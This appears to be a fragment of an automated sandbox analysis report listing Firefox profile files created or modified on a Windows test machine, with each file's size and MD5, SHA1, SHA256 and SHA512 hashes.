SHA512aed7d53420f5d47c723b326dde6eff65a70f0bd6fe942e397540d9564df4e5648184a88819a502a649763c9f2b22b1cec16df5da1bd5e6cd6c4b5284cc26f72e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\mpvc2cwh.default-release\AlternateServices.bin
Filesize17KB
MD516a9fe5d1b501cbb2ee8163eba07743a
SHA1bb57bde559d1e71532376e40e6d5c2b5a0622541
SHA2560c7a76b70bcb086147b266903aad768b4e128addba2919ab4b3d43ac82d51ca6
SHA5123d0774665eea0b78802c3270b0d8ba95da09030210ead2994260ac17b7a9f22302f9d37a00bc8e5ee4961a83483d40f3626001b693d7601d0ad7b3d2657f993b
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\mpvc2cwh.default-release\datareporting\glean\db\data.safe.tmp
Filesize6KB
MD52064e8af149887f767e6352dfa72d969
SHA133751b431cc1e916ed21f898d51afcd8edf08390
SHA2567c27b4a0c151776995abee8db09db33baf62d3db5656b5d571338ee69c9ce275
SHA5120a03ac7b6351f4c3fdadb4adc956191cfdc8f6e2bf0f5fce053a20a114ca3cd09bb6bd283ad30798dbc10bc66d2f6c77204453cc2526e4e35a52ff330ac4f114
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\mpvc2cwh.default-release\datareporting\glean\db\data.safe.tmp
Filesize29KB
MD5b5ee6cd737f1043eb8c45062e070ca10
SHA1021becceda18abb0f51dc171839b9a98211703fa
SHA256f2ac65e61fc176964afd5e22c3d299ba50066f6e0e050cd7e368714600ddbe76
SHA51293d0632a078025bb9f0ea67c3abd7f5bb224ff06f4d0f93791e192292205bca2c0e3ed3c9c3f8b48756dea6fcc8fea306113e60fcc9ab5c81e0a5ac2f1dd5bfb
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\mpvc2cwh.default-release\datareporting\glean\db\data.safe.tmp
Filesize54KB
MD588ea40ca9b9b337f03f1d82400103d9c
SHA1d9c0f9d3aea622ee01baf6dff77c37cfb624537e
SHA2561cc5b75f3dc851f83726cc27f9af8c79e766dde1b455fc960b0f24a8d2d585f6
SHA5123e135e186d7ba19e2603cdbb276472b8ea43d2e13ea3bee24aed6e2ac98f03cfa685a30d0538ef4b5bd3e666778a719aa439036e2813486def223c9c7be9848b
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\mpvc2cwh.default-release\datareporting\glean\db\data.safe.tmp
Filesize7KB
MD55976f43082bffe7f2238adbe25215e6d
SHA1138161cf6365e971b5d9de483687bd2af4d73cb1
SHA2569f67e7e09a2e6684d72794120f1083d0d32f3e76e0e7d2dcddaf4210eb6bff0f
SHA5124c5d3eecd58be28b3b86488193b909c64ac2601535f7ef1be4b3288f4d07a0042dada5989a0477ce5c157912ba4550c789dd8c1ee99afa3e808e1db207f82e56
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\mpvc2cwh.default-release\datareporting\glean\db\data.safe.tmp
Filesize54KB
MD53ed0fff9cd6543af69bc8a273569ff01
SHA10eb63e00e024116080aaea7a8a4cc03f8714da2d
SHA256ce9da3764fcff94a56210cc80bbe2ce28c4fbe29500288d3f7ed2b0355b072d8
SHA51226db8b2934eeee25dd30446d1f3df2ab0fc380b354d154e2154879bf0299b7732b691b622eb909a102fbe7b349803eade59943f45181dca0d6e77ac5873682c7
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\mpvc2cwh.default-release\datareporting\glean\events\events
Filesize1KB
MD5e8d84f7a364443e5eedd9ed3e88a9159
SHA150091605590bcb1b9024ae751507f285cd1cf843
SHA25667566733211ff70c1bbc341f0836d2992482cece9b2dab98691bbe8c49b978a8
SHA512497b869d2d5c45d6495d9109bee0d214ae6676fef77c773e8766b9ced5c982695dcd09b7b33de96d705254d0a5edce6006995d065b9794ea67a8e4dea8f9726f
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\mpvc2cwh.default-release\datareporting\glean\pending_pings\0f5e4b9d-bab9-49e4-a5c4-0e9649c1ef77
Filesize235B
MD5de87cf11dc6feab8f6aaa0b710f547f3
SHA1fe031badf0b685fcc243b3cfcea70ee711bb70ac
SHA25623e74f910363f45fffc4aea70e23366ae21e30fdaed6642f760d7c75a9c731c0
SHA51229a25ac7cf8a935b35bde339a9b618651462b18d08c3666b40a8b306a537a0d2d0b2a4f2ed768546c5afe0dd0f3af7af41552c7ce0d9abcf41386dee1a9ba587
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\mpvc2cwh.default-release\datareporting\glean\pending_pings\42f4324d-6c38-40d5-bf3c-c30c4d9f1743
Filesize886B
MD5b95484aa2275083d41b580b34e70e716
SHA194803b256545e0286e9693f50349955f8970d9ea
SHA25629bcf47ce68cfce0af5b853b8a69f45ba00e693ecf7bc8fe6f711fe409bcd54a
SHA512c2c98f30cb67c8b841613958e1dd7a478b15dc57b3f6eb1e41581492d9f5e37477fca2fd9e7aaacac5df1e1439afbb5694397283d71f11bd0bc5e8216339e63a
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\mpvc2cwh.default-release\datareporting\glean\pending_pings\48a78ac6-38a0-4ed8-85ef-ee9cd6990788
Filesize16KB
MD5fb5c233e502a57a2be999496df088805
SHA119a51c68edb6218e4ca157b89f653ab7de399a30
SHA2563803499752c66fb5641e86ddf07bc33ad74dee73e317f8eff2a30bd1add564c8
SHA51232f27b83a44be2125ef051d47ab370a6675291cb30e3cf2114bc18e8da57df078de7d8ba809903771013e779f8be92fb0bdd38c361fe549423780fcf05818b45
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\mpvc2cwh.default-release\datareporting\glean\pending_pings\911442d9-74ff-44aa-ba3e-c0a19b204ed7
Filesize2KB
MD555836597d47c02e4d74a14831d148063
SHA1c5f85bd9907a5f60dd108eafb4730f6720d96cbe
SHA256c6a1043163941e119ca91e01be2266e0f30501144eb939263cac73bb388805df
SHA512224d8f8cbdd2f048827edacf79644ddc81a7c01fe2c159807b3691bb8080f8336acc376d5ab47f183c66e52df096830563b7f2156a46d90c1df0e1ed829e3687
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\mpvc2cwh.default-release\datareporting\glean\pending_pings\99a108fc-1eee-4177-b932-f2a802da1a2d
Filesize235B
MD582ddd288b3c439a9c85ca3b36ab0046d
SHA107382cf82350c996522153c92ee8185ed7733363
SHA2561f28af8cd52345e4ff95a69d147447db7178dfef7d1b2ed9e50b9d5c83abfd51
SHA512c36f07e8d994b55387a8c11a90859fb5022aa5bc83f59bf2bdb2bd875c90032f32432a099277049fd487faa2bf6de20bf5dfa8a75b0463a873a7ef4b37d160c6
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\mpvc2cwh.default-release\datareporting\glean\pending_pings\c6641234-ad6b-40cd-abde-654f171cd5cf
Filesize883B
MD5fa7ec21a4418991014e88fef4a060813
SHA1392c9194bb2cef32905de100db679cc855aa76d4
SHA256d83067b3809dfbf5fe11a5e53435d74af77489eeb13fc6c8a9ff547edc4a3c3a
SHA51257882b795de326c3a8c9548cb2c4185d4805cc061aea49a98bef860c21291b462903f35f17445117e275c1c8e6292e269bce765725897f6d3308aef669c759bd
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\mpvc2cwh.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll
Filesize1.1MB
MD5842039753bf41fa5e11b3a1383061a87
SHA13e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\mpvc2cwh.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info
Filesize116B
MD52a461e9eb87fd1955cea740a3444ee7a
SHA1b10755914c713f5a4677494dbe8a686ed458c3c5
SHA2564107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA51234f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\mpvc2cwh.default-release\gmp-widevinecdm\4.10.2830.0\manifest.json
Filesize1001B
MD52ff237adbc218a4934a8b361bcd3428e
SHA1efad279269d9372dcf9c65b8527792e2e9e6ca7d
SHA25625a702dd5389cc7b077c6b4e06c1fad9bdea74a9c37453388986d093c277d827
SHA512bafd91699019ab756adf13633b825d9d9bae374ca146e8c05abc70c931d491d421268a6e6549a8d284782898bc6eb99e3017fbe3a98e09cd3dfecad19f95e542
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\mpvc2cwh.default-release\gmp-widevinecdm\4.10.2830.0\widevinecdm.dll
Filesize18.3MB
MD59d76604a452d6fdad3cdad64dbdd68a1
SHA1dc7e98ad3cf8d7be84f6b3074158b7196356675b
SHA256eb98fa2cfe142976b33fc3e15cf38a391f079e01cf61a82577b15107a98dea02
SHA512edd0c26c0b1323344eb89f315876e9deb460817fc7c52faedadad34732797dad0d73906f63f832e7c877a37db4b2907c071748edfad81ea4009685385e9e9137
-
Filesize
8KB
MD5b53a6e470f88e4a7d1780d21409e1997
SHA1967c470acbb83243c8e46d2b87c1bccde9491d66
SHA25655cb58e2f0478e06c82d708905ca2ba524489938a1bb33323f46221485c35b7b
SHA512bf7945136b342d75a8f5b9a229eae762e3dd0c8b3bc8cab9b285ee0bed945301ba1f448fc2b4bbb95d71f904d2f6ca172e6398c5f6b43e7763aced48297e9692
-
Filesize
11KB
MD52162368617dc1fc9c0266d9a07fee9c6
SHA193c734f3f8f517030165f6bcc54a5a821ff00163
SHA256899633f90d8297e70b7a2a4a4137ae8cb1d9ac9acbe8f7e110c5587d9a11826a
SHA51297d7599bede6d75f9481153c35892e7f1e1662d5a16836c073b5b9c82fd343e898b7417a8988128596e65831e4d19d55ebbb2e2e1f8d1ade1416c353053cecfc
-
Filesize
6KB
MD54ccceab6371fb77531576985f422e5d7
SHA1447705146d60f1077268e309d4a767ba7a862065
SHA2565b89a025d5ebe9854d8a953191acbb550538b48ed667cd5207525ffdc27cd85d
SHA512344f4585838786280c8bd7c339a008e415b678c3b638d52dcc9e204b8d6f55cdb0edbc2c553d11bc8a74df633f52232907cad3ac306edaee990d84adf64f3c99
-
Filesize
6KB
MD57a18c08c8d2fc14d7a9efed87f56d571
SHA19a1327e124f23da4bacafb2ccb1e597fa3250699
SHA2568555a0f34185052776db15fa34009f49a8f4849a794af9ebb8b77f7a4839952c
SHA5129b207d2857080f6fa6a18aa418b400298c9c316f16435a8a8c84a463b8082abe9eaed9e57dd8b540e731b6d4a0391adc97e2d5d27ceb36e0cc9fe144c9e3b6a7
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\mpvc2cwh.default-release\sessionstore-backups\recovery.jsonlz4
Filesize1KB
MD54a71ff3c673fa914aae5dec03a55fcec
SHA14b28d35a9d6eaeb5f4aa64a13711e7a0f3a889c5
SHA256043564aa59981e5c869144fe0941e1d08a4ee7a573b180cbad80c6849be6fa62
SHA5128e6352d53ef95c36acc83e28efbcfb6db4c95254876a91c8a48f7dc959db7b1ad99ee6eebb65f59f70c54ac9f4e6ec8093be55572da1c79310697899cd0bd4bb
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\mpvc2cwh.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Filesize10.4MB
MD50654c1c4e84d8732a9355b9846669d8d
SHA184442aa7569cc425047978268317b1f909f5ad45
SHA2560c2d87d9bf75db75d328caa823cf985a9699ecfa58711050140a4a9ab03d7432
SHA512c5553832dce9d0b34dac8b50f520651a1de7d3ad3d71530459b195acdd3c59e2cc1cc9952828153cb617d7bc436a412e13a872817931630581684015e66f33bc
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\mpvc2cwh.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Filesize10.4MB
MD53f77d017e45ed700095d88be076e1004
SHA193ffba3e2767cc4a7b9dcf0c69ee8d873690453c
SHA256a7b475a1b73e5e0b269ae520db7c7d5d414cf776a48027235724f2d9795a81a4
SHA512c426da31f5cfc0032dc219ef9fb8e8adfc393da37572d2dd77e3b2d283293832bfe4655cf5bfb5acf0c56e75a084d002b13088d80ad411e12c48315c72e30997